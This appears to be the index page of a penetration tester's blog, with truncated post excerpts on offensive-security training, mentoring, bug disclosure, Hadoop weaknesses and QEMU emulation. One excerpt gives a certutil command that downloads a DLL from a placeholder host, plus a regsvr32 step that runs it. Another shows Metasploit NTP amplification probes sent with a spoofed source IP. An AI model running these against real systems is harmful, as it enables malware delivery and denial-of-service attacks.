Dark Side Ops I & 2 Review

Dark Side Ops I https://silentbreaksecurity.com/training/dark-side-ops/https://www.blackhat.com/us-17/training/dark-side-ops-custom-penetration-testing.html  A really good overview of the class is here https://www.ethicalhacker.net/features/root/course-review-dark-side-ops-custom-penetration-testingI enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-) I’ll try not to cover what is in Raphael’s article as it is still applicable and I am assuming you read it before continuing on. I really enjoyed the VisualStudio time and building Slingshot and Throwback myself along with getting a taste for extending the  implant by adding the keylogger, mimikatz, and hashdump modules.Windows API developers may be able to greatly extend slingshot but I don't think I have enough WinAPI kung fu to do it and there wasn’t enough setup around the “how” to consistently do it either unless you have a strong windows API background. However, one of the labs consisted of adding load and run powershell functionality which allows you to make use of the plethora of powershell code out there.There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers. Cons of the class.The visual...
Read more

Books I’d give to my 30yr old self

A good friend/co-worker recently turned 30.  In preparation for his birthday party I gave some thought to my 30th birthday and the things I now know or have an idea about and what I wish I had known at that point in my life. I decided to buy him a few books that had impacted my life since my 30th birthday and that I wish I had know or read earlier in life.I'll split the post into two parts; computer books and life/metaphysical books.Computer booksThis is buy no means an exhaustive list.  A more exhaustive list can be found here (recently updated).He already had The Web Application Hacker's Handbook but had he not I would have purchased a copy for him.  There are lots of Web Hacking books but WAHH is probably the best and most comprehensive one.The other books I did purchase were The Phoenix Project  and Zero to One.The Phoenix Project is absolutely one of the best tech books I've read in the last few years.  Working for  Silicon Valley companies I think it can be easy to take for granted the whole idea of DevOps and the power it brings...
Read more

Mentoring: On Blogging

Received the question about blogging. More specifically:How and WhyHow to benefit from bloggingHow to be consistent with postingIn my mind, the key to success and blogging is to be totally selfish in its planning and execution.Blogging is a personal activity/journey that you allow the public to be a part of.  What I mean by this is that the main audience for your blog should be YOU.  My blog is a place where I take notes and occasionally try to talk about a more touchy-feely topics or issues. These notes are notes that I'm ok with sharing publicly. I also keep a private blog  (but really more notes/cheat-sheet think RTFM...I use MDwiki) because you don't need to give everyone all your tricks and secrets.   If you show up for a new job and everyone knows your tricks because you've shared them publicly (because you need attention from strangers) what value are you bringing to your employer?The benefit to blogging is note taking. I'm a HUGE proponent of taking notes and I'd chalk a lot of my success up to taking copious notes.  When I figure out how to mess with technology X, I take notes on...
Read more

Certutil for delivery of files

Quick post putting together some twitter awesomenessreferences:https://twitter.com/subtee/status/888125678872399873https://twitter.com/subTee/status/888071631528235010https://twitter.com/malwaretechblog/status/733651527827623936Let's do it1. Create your DLL2. Base64encode it (optional)3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down4. Base64decode the file with certutil5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll
Read more

Follow up to the vuln disclosure post

Summary of responses from this post: http://carnal0wnage.attackresearch.com/2017/06/vulnerability-disclosure-free-bug.htmlI wanted to document/summarize some of the responses I received and some of the insights I gained via self observation and my interactions with others on the topic.I received a few replies (less than I hoped for though). To summarize a few:-I'm not a greedy bastard for thinking it would "be nice" to get paid for reporting a vuln but I should not expect them.-Bug Bounty awards are appreciation for the work not a right.-Someone made a nice analogy to losing AWS/Slack keys to losing a cell phone or cat.  Every person might value the return of that cat or phone differently.-I'm super late to the game if I want to get on the "complain about bug bounties / compensation" train.  **I think this is not quite the same situation but I appreciate the comment**-The bigger the company, the harder it is to issue an ad-hoc reward if they don't have an established process.-They have value - just not monetary. The value is to the end-user.-Generally speaking, I think quite a lot of the BB crowd have a self-entitled, bad attitude.-Always ask yourself if this...
Read more

Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard

Backstory:Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.The above is important as it relates to the rest of the post and topic(s).I was relaying some frustrations to a close non-infosec friend about my experience of discovering  companies had made some fairly serious Internet security uh ohs... like misconfigured s3 buckets full of db backups and creds, root AWS keys checked into github, or slack tokens checked into github/pastebin that would give companies a "REALLY bad day".  These companies had been receptive to the reporting and fixed the problem but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.So this blog post is an attempt for...
Read more

NTP/SNMP amplification attacks

I needed to verify a SNMP and NTP amplification vulnerability was actually working. Metasploit  has a few scanners for ntp vulns in the auxiliary/scanner/ntp/ntp_* and it will report hosts as being vulnerable to amplification attacks.msf auxiliary(ntp_readvar) > run Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts) 1.1.1.1:123 - Vulnerable to NTP Mode 6 READVAR DRDoS: No packet amplification and a 34x, 396-byte bandwidth amplificationI've largely not paid attention to these types of attacks in the past but in this case needed to validate I could get the vulnerable host to send traffic to a target/spoofed IP.I set up 2 boxes to run the attack; an attack box and a target box that I used as the spoofed source IP address.  I  ran tcpdump on the target/spoofed server (yes...listening for UDP packets) it was receiving no UDP packets when I ran the attack.  If I didn't spoof the source IP,  the vulnerable server would send data back to the attacker IP but not the spoofed IP.Metasploit (running as root) can spoof the IP for you:msf auxiliary(ntp_readvar) > set SRCIP 2.2.2.2 SRCIP => 2.2.2.2msf auxiliary(ntp_readvar) > run Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts) Sending...
Read more

Mentoring: On meeting your **Heroes**

Mentoring: On meeting your  **Heroes**I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote about even the most popular infosec person is like being a famous bowler.  Except for rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical and my neighbor just asks me to help configure his wifi.This topic came up because the person I'm mentoring met "a famous infosec person" and the guy proceed to be a drunk dbag to him.  It ended up taking quite a bit of wind out of his sail to have someone he kinda looked up to bag on his current career state and talks he was working on.When I first joined the army how I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do no wrong, individual.  Shit, If someone has all this shit on their chest they must be badass right??!!For more info on badges: https://en.wikipedia.org/wiki/Badges_of_the_United_States_ArmyWell the Army does a great job of stacking the people you initially meet...
Read more

DevOoops: Hadoop

What is Hadoop?"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."from: http://hadoop.apache.org/If you've ever heard of MapReduce...you've heard of Hadoop.NFI what i'm talking a bout? Here is a 3minute video on it: https://www.youtube.com/watch?v=8wjvMyc01QYWhat are common issues with MapReduce / Hadoop?Hadoop injection points from Kaluzny zeronights talk:HueCommon defaults admin/admin, cloudera/clouderaAlthough occasionally you'll find one that will just let you pick your own :-)If you gain access, full HDFS access, run queries, etcHDFS WebUIHDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070...
Read more

Raspbian/Kano OS in QEMU

Quick notesI wanted to be able to boot the Kano OS in a virtual machine so i could play hack minecraft with the kids and play along with the Kano OS desktop/games.  I was trying to avoid plugging a raspberry pi into an monitor to use and wanted to use it on my local laptop.Well, not so easy. VirtualBox/VMware dont support ARM. However QEMU does.This repo (https://github.com/dhruvvyas90/qemu-rpi-kernel/wiki/Emulating-Jessie-image-with-4.x.xx-kernel) had the recent raspberry pi kernels to use with QEMU.If you follow the steps on that page with regards to mounting the image and editing /etc/ld.so.preload and /etc/fstab I was able to get the image to boot up successfully...slow as hell...but it technically was working. command to boot with vnc: $ qemu-system-arm -vnc :1 -kernel qemu-rpi-kernel/kernel-qemu-4.4.34-jessie -cpu arm1176 -m 256 -M versatilepb  -append "root=/dev/sda2 rootfstype=ext4 rw"  -hda Kanux-Beta-v3.9.0-Lovelace-jessie-rc-2017-03-23_04-48.imgOS with vnc:I was so horribly slow i don't think this is feasible.  I am going to try using libvirt to make it better or just see if i can play hack minecraft another way.  If I get anywhere further with the project i'll post an update.
Read more
Page 1 of 3123